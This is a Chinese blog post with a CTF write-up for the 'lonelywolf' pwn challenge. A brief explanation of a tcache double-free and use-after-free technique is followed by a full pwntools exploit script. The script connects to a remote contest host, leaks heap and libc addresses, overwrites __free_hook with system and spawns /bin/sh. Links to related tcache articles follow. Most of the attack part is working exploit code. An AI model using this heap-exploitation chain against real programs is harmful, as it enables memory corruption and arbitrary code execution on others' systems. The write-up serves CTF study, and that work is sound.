lonelywolf_exp(tcache double free)

最新推荐文章于 2023-12-08 14:44:46 发布
最新推荐文章于 2023-12-08 14:44:46 发布
阅读量168 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33590156/article/details/119391398
版权

题目只能申请一个chunk指针,但是可以重复申请chunk,而且存在uaf,不可溢出

首先绕过tcache的check使用double free泄露堆地址(老版本是可以直接free的,但是新版本需要free后edit一下再free),然后通过uaf在tcache中存放好两个指针,一个用来修改size,一个用来free chunk,之后申请0x70chunk,和另一个chunk防止合并。接着通过第一根指针修改size>0x80,然后通过第二根指针free此chunk,使用double free将他free 8次填满tcache,第八次会到unsortedbin中,之后泄露libc,打free_hook为system。

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

ms = remote("119.3.230.244",22774)
#ms = process("./lonelywolf")
libc = ELF("./libc-2.27.so")

def add(size):
    ms.sendlineafter('Your choice: ', '1')
    ms.sendlineafter('Index: ', str(0))
    ms.sendlineafter('Size: ', str(int(size)))
    #ms.sendlineafter('now you can write something\n', content)
def edit(n,text):
	ms.sendlineafter("Your choice: ",'2')
	ms.sendlineafter("Index: ",str(n))
	#ms.sendlineafter("Size: ",len(text))
	ms.sendlineafter("Content: ",text)
def free(n):
    ms.sendlineafter('Your choice: ', '4')
    ms.sendlineafter('Index: ', str(n))
def show(n):
	ms.sendlineafter("Your choice: ",'3')
	ms.sendlineafter("Index: ",str(n))

add(0x20)
free(0)
edit(0,'\x00'*0x10)
free(0)
show(0)
ms.recvuntil("Content: ")
heap = u64(ms.recv(6).ljust(8,'\x00'))
log.info("heap="+hex(heap))
edit(0,p64(heap+0x60))
add(0x30)
free(0)
edit(0,p64(heap+0x70))
add(0x70)
add(0x40)
edit(0,p64(0)+p64(0x41))

add(0x20)
add(0x20)
edit(0,p64(0)+p64(0x91))
add(0x30)
add(0x30)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
edit(0,'\x00'*0x10)
free(0)
show(0)
ms.recvuntil("Content: ")
main_arena = u64(ms.recv(6).ljust(8,'\x00'))-96
log.info("main_arena="+hex(main_arena))
malloc_hook = main_arena-0x10
libc_base = malloc_hook-libc.sym["__malloc_hook"]
log.info("libc_base="+hex(libc_base))
free_hook = libc_base+libc.sym["__free_hook"]
system = libc_base+libc.sym["system"]
ogg = libc_base+0x10a41c
add(0x70)
add(0x70)
add(0x10)
free(0)
edit(0,p64(free_hook))
add(0x10)
add(0x10)
edit(0,p64(system))
add(0x10)
edit(0,"/bin/sh\x00")
free(0)
#gdb.attach(ms)
ms.interactive()
Wust-Mo0n5ea丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[tcache double free] Mynote
huzai9527的博客
07-11 493
[tcache double free] 1. ida分析 存在double free 以及 uaf 题目给的libc是早期的可以进行double free的2.27版本 关于如何使用题目提供的libc进行调试,看ctf-pwn-patchelf-用题目给的libc运行二进制文件 2.思路 先填满tcache,使用unstored bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache) 利用double free修改free_hook为system
利用全局chunk数组,free(负数)来实现tcache double free
tbsqigongzi的博客
10-17 153
ciscn_2019_ne_6
[tcache double free + orw]MynoteMax
huzai9527的博客
07-11 217
[tcache double free + orw]MynoteMax 1. ida分析 漏洞点和Mynote一样,但是加了沙盒 禁用了execve,因此同样利用double free 和 uaf 进行 orw进行操作 2. 思路 本题需要从堆打到栈,需要利用一些通用的gadgets, 如setcontext + 53 将 free_hook 设置为 setcontext +53,再在相应的chunk中布置相应的sigframe free掉相应的chunk触发setcontext(srop),
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1514
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
hitb2018_gundam —— tcache double free
weixin_48066554的博客
05-31 289
hitb2018_gundam —— tcache double free 高达?哪里有高达!
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
使用keepalived来完成nginx的高可用
03-30
### 使用Keepalived实现Nginx的高可用性 #### 一、引言 随着互联网技术的迅猛发展,用户对网站稳定性和响应速度的要求日益提高。为了满足这些需求,采用高可用架构成为一种常见的解决方案。Nginx作为一款高性能的...
acl详细解读
03-30
### ACL详细解读 #### 一、概述 ACL(Access Control List),即访问控制列表,是一种在文件系统中为文件或目录设置更为灵活的权限管理方式。传统的UNIX/Linux系统中的文件权限仅支持设置所有者(Owner)、所有者...
redis主从配置以及哨兵模式配置
03-30
### Redis 主从配置及哨兵模式详解 #### 一、实验环境 - **Redis 版本**: Redis 4.0.6 - **操作系统**: Linux (安装于虚拟机中) - **宿主主机**: Windows 10 x64 - **远程终端工具**: Xshell 5 ...
linux记录登录用户的详细操作
03-30
### Linux记录登录用户的详细操作 #### 一、背景与需求 在日常的系统维护工作中,确保系统的安全性至关重要。近期,在Linux服务器上发生了一些文件被篡改的情况,这引起了管理员的高度警觉。为了追查问题根源并...
i春秋2020新春战役PWN之document(绕过tcachedouble free检测)
seaaseesa的博客
02-27 3161
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1062
浙江省第五届大学生网络与信息安全竞赛预赛pwn
double free detected in tcache 2问题记录
最新发布
Z_oioihoii
12-08 443
解释,当执行free(b);时会报错,因为在 b->Test();调用时已经执行了delete this;将堆区的内存释放掉,此时再次根据b的地址去释放会发现不存在,所以报错double free detected in tcache 2。
Tcache bin总结
N1rvana的博客
03-13 1621
Tcache Tcache是glibc 2.26之后引入的机制,与glibc 2.23版本下堆利用方式有一定区别,产生了新的利用方式。 0x1 相关结构体 tcache_entry typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; tcache_entry用来链接空闲的tcache chunk,其中的next指针指向下一个大小相同的空闲tcache chunk。 注意:这里的next指针指向的是user
tcache attack
yeshen4328的专栏
11-01 200
tcache attack tcache double free double free可以通过对同一块内存free两次,实现任意地址写。当libc版本在2.26以上时,free的块优先放入tcache,malloc也优先从tcache中取,性能更好。但是安全检查变弱了。 static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); ass
free(): double free detected in tcache 2 如何解决
热门推荐
qq_49101164的博客
04-19 3万+
free(): double free detected in tcache 2 如何解决 原因 free():在tcache 2中检测到双空闲,在执行程序的过程中对同一块内存单元进行了两次free()操作。 在循环中包含free();语句,容易出现这类问题。 解决方法 可以设置两个指针,进行操作,下面给出示范 出现double free() 的报错 只设置了一个指针变量n,在循环的过程中,会再次对n进行free();操作因此会出现此次问题 double free()得到解决 设置两个指针变量,
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4173
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 544
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcachedouble free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
C++: free(): double free detected问题分析和处理
简单IoT
01-22 1万+
最近在项目中遇到了“free(): double free detected”问题,出问题的代码类似于: #include <queue> #include <cstring> #include <iostream> using namespace std; class Test { int *myArray; public: Test() { myArray = new int[10]; } ~Test() {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值